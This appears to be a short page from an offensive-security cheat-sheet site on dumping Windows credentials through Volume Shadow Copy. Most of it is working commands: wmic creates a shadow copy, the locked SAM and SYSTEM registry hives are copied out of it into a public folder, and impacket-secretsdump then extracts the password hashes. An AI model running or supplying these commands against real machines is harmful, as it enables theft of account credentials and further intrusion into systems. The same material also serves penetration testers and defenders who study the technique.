VOLUME SHADOW COPY

SAM hive and SYSTEM hive are always locked on the current system

Elevated Shell is required to use Volume Shadow Copy

wmic shadowcopy call create Volume='C:\'
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\users\public\sam.save
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\users\public\system.sav

After transferring registry hives into local machine, by using impacket-secretsdump we can dump all secrets

PreviousLSASS DUMP NextREGISTRY

Last updated 3 years ago